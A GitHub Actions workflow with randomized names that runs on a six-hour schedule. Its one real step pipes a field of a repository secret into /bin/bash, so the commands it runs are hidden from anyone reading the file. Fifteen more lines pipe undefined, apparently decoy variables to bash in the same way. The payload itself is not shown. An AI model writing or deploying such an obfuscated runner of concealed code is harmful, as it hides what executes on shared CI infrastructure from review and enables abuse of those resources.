name: dongdoggou

on:
  workflow_dispatch:
  schedule:
    - cron: '22 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dongdoggou
        env:
          yan80598: ${{ secrets.yan80598 }}
        run: |
          echo $yan80598 | jq -r .f5 | /bin/bash
          echo $ehi5 | jq -r .lewn6 | /bin/bash
          echo $hze363 | jq -r .xgbrs73379 | /bin/bash
          echo $qzgyp23 | jq -r .nuj961 | /bin/bash
          echo $c399 | jq -r .b2900 | /bin/bash
          echo $snvwj8 | jq -r .kb9 | /bin/bash
          echo $hwhc24 | jq -r .endjo27 | /bin/bash
          echo $jr25615 | jq -r .yh8 | /bin/bash
          echo $nq7 | jq -r .q8 | /bin/bash
          echo $iudk55 | jq -r .djyfm9805 | /bin/bash
          echo $q99 | jq -r .zsgvu585 | /bin/bash
          echo $kc43623 | jq -r .dxbx18826 | /bin/bash
          echo $ta70210 | jq -r .oc1 | /bin/bash
          echo $puv8 | jq -r .tfp6 | /bin/bash
          echo $vp66 | jq -r .q42 | /bin/bash
          echo $n37 | jq -r .dal330 | /bin/bash

